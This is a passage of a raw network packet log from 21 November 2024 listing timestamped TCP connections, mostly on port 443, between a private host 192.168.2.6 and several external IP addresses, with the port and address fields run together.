                                                                                                                                                                              Nov 21, 2024 08:30:52.248720884 CET44349814184.28.90.27192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.249053955 CET44349814184.28.90.27192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.254203081 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.254239082 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.254350901 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.255173922 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.255196095 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.303884983 CET49814443192.168.2.6184.28.90.27
                                                                                                                                                                              Nov 21, 2024 08:30:52.399523020 CET49814443192.168.2.6184.28.90.27
                                                                                                                                                                              Nov 21, 2024 08:30:52.443329096 CET44349814184.28.90.27192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.604032993 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.604073048 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.604185104 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.604516029 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.604537010 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.605873108 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.605905056 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.605957985 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.606157064 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.606168985 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.633816004 CET4434981513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.634392977 CET49815443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.634416103 CET4434981513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.635119915 CET49815443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.635124922 CET4434981513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.849832058 CET44349814184.28.90.27192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.849912882 CET44349814184.28.90.27192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.850120068 CET49814443192.168.2.6184.28.90.27
                                                                                                                                                                              Nov 21, 2024 08:30:52.850121021 CET49814443192.168.2.6184.28.90.27
                                                                                                                                                                              Nov 21, 2024 08:30:52.850121021 CET49814443192.168.2.6184.28.90.27
                                                                                                                                                                              Nov 21, 2024 08:30:52.850171089 CET44349814184.28.90.27192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.899418116 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:52.935591936 CET4434981613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.936213970 CET49816443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.936235905 CET4434981613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.936873913 CET49816443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:52.936878920 CET4434981613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.943675995 CET49824443192.168.2.6184.28.90.27
                                                                                                                                                                              Nov 21, 2024 08:30:52.943722010 CET44349824184.28.90.27192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:52.943778038 CET49824443192.168.2.6184.28.90.27
                                                                                                                                                                              Nov 21, 2024 08:30:52.944142103 CET49824443192.168.2.6184.28.90.27
                                                                                                                                                                              Nov 21, 2024 08:30:52.944156885 CET44349824184.28.90.27192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.017468929 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.018160105 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.018188953 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.018758059 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.018765926 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.082248926 CET4434981513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.082276106 CET4434981513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.082324982 CET49815443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.082340956 CET4434981513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.082354069 CET4434981513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.082407951 CET49815443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.082607985 CET49815443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.082623959 CET4434981513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.082633972 CET49815443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.082638979 CET4434981513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.085473061 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.085508108 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.085726976 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.085726976 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.085757971 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.154388905 CET49814443192.168.2.6184.28.90.27
                                                                                                                                                                              Nov 21, 2024 08:30:53.154407978 CET44349814184.28.90.27192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.370999098 CET4434981613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.373328924 CET4434981613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.373450994 CET49816443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.373495102 CET49816443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.373495102 CET49816443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.373512983 CET4434981613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.373521090 CET4434981613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.376048088 CET49826443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.376074076 CET4434982613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.376380920 CET49826443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.376380920 CET49826443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.376405001 CET4434982613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.460510969 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.460679054 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.460962057 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.460999012 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.460999012 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.461016893 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.461025953 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.484345913 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.484401941 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.484632969 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.484632969 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.484668970 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.931251049 CET4434981813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.931713104 CET49818443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.931735992 CET4434981813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:53.932228088 CET49818443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:53.932231903 CET4434981813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.106945038 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.107924938 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.107924938 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.107964993 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.107978106 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.370243073 CET4434981813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.370301962 CET4434981813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.370356083 CET49818443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.370374918 CET4434981813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.370587111 CET49818443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.370603085 CET4434981813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.370620966 CET49818443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.370944977 CET4434981813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.371025085 CET4434981813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.371073961 CET49818443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.375827074 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.375883102 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.375952005 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.376082897 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.376106024 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.391035080 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.391558886 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.391624928 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.393080950 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.393168926 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.401108980 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.401269913 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.401664019 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.401698112 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.450457096 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.464528084 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.465135098 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.465195894 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.466716051 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.466789961 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.469054937 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.469155073 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.469322920 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.469341993 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.480178118 CET44349824184.28.90.27192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.480246067 CET49824443192.168.2.6184.28.90.27
                                                                                                                                                                              Nov 21, 2024 08:30:54.481802940 CET49824443192.168.2.6184.28.90.27
                                                                                                                                                                              Nov 21, 2024 08:30:54.481812000 CET44349824184.28.90.27192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.482040882 CET44349824184.28.90.27192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.483289003 CET49824443192.168.2.6184.28.90.27
                                                                                                                                                                              Nov 21, 2024 08:30:54.514250040 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.523355961 CET44349824184.28.90.27192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.574913025 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.574942112 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.575002909 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.575031042 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.575069904 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.575263977 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.575270891 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.575337887 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.575504065 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.575548887 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.575587034 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.579449892 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.579479933 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.579554081 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.579881907 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.579899073 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.880433083 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.880475998 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.880490065 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.880512953 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.880539894 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.880547047 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.880574942 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.880595922 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.880618095 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.880631924 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.928991079 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.929457903 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.929481030 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.929959059 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.929974079 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.969594002 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.969644070 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.969692945 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.969733000 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.969729900 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.969806910 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.969835997 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:54.969866991 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.969866991 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:54.969902039 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.051074028 CET44349824184.28.90.27192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.051150084 CET44349824184.28.90.27192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.051203966 CET49824443192.168.2.6184.28.90.27
                                                                                                                                                                              Nov 21, 2024 08:30:55.052043915 CET49824443192.168.2.6184.28.90.27
                                                                                                                                                                              Nov 21, 2024 08:30:55.052072048 CET44349824184.28.90.27192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.052088022 CET49824443192.168.2.6184.28.90.27
                                                                                                                                                                              Nov 21, 2024 08:30:55.052095890 CET44349824184.28.90.27192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.069236994 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.069266081 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.069331884 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.069405079 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.069452047 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.069452047 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.076539040 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.121622086 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.121687889 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.121721983 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.121794939 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.121830940 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.158750057 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.158834934 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.158900023 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.158972979 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.158978939 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.159034967 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.159255981 CET49822443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.159288883 CET4434982213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.167623997 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.167686939 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.167741060 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.167762995 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.167793036 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.168255091 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.203946114 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.204907894 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.204907894 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.204930067 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.204940081 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.228153944 CET4434982613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.228928089 CET49826443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.228954077 CET4434982613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.229317904 CET49826443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.229325056 CET4434982613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.232518911 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.232582092 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.232685089 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.232685089 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.232718945 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.232873917 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.357068062 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.357168913 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.357228041 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.357271910 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.357311964 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.357366085 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.376990080 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.377039909 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.377099991 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.377124071 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.377162933 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.377255917 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.387259960 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.387283087 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.387531996 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.387547970 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.387753010 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.387767076 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.387787104 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.387943029 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.387978077 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.388128042 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.392452002 CET49833443192.168.2.613.107.246.42
                                                                                                                                                                              Nov 21, 2024 08:30:55.392491102 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.392627001 CET49833443192.168.2.613.107.246.42
                                                                                                                                                                              Nov 21, 2024 08:30:55.393352032 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.393378019 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.393392086 CET49833443192.168.2.613.107.246.42
                                                                                                                                                                              Nov 21, 2024 08:30:55.393413067 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.393569946 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.393670082 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.393681049 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.397322893 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.397387981 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.397434950 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.397463083 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.397509098 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.397551060 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.414786100 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.414836884 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.414880037 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.414895058 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.414952040 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.414952040 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.562802076 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.562854052 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.562910080 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.562966108 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.563024044 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.563574076 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.576360941 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.576407909 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.576529026 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.576529026 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.576550007 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.576690912 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.592566967 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.592614889 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.592736006 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.592736006 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.592767954 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.593071938 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.607244968 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.607295990 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.607336044 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.607350111 CET4434982313.107.246.45192.168.2.6
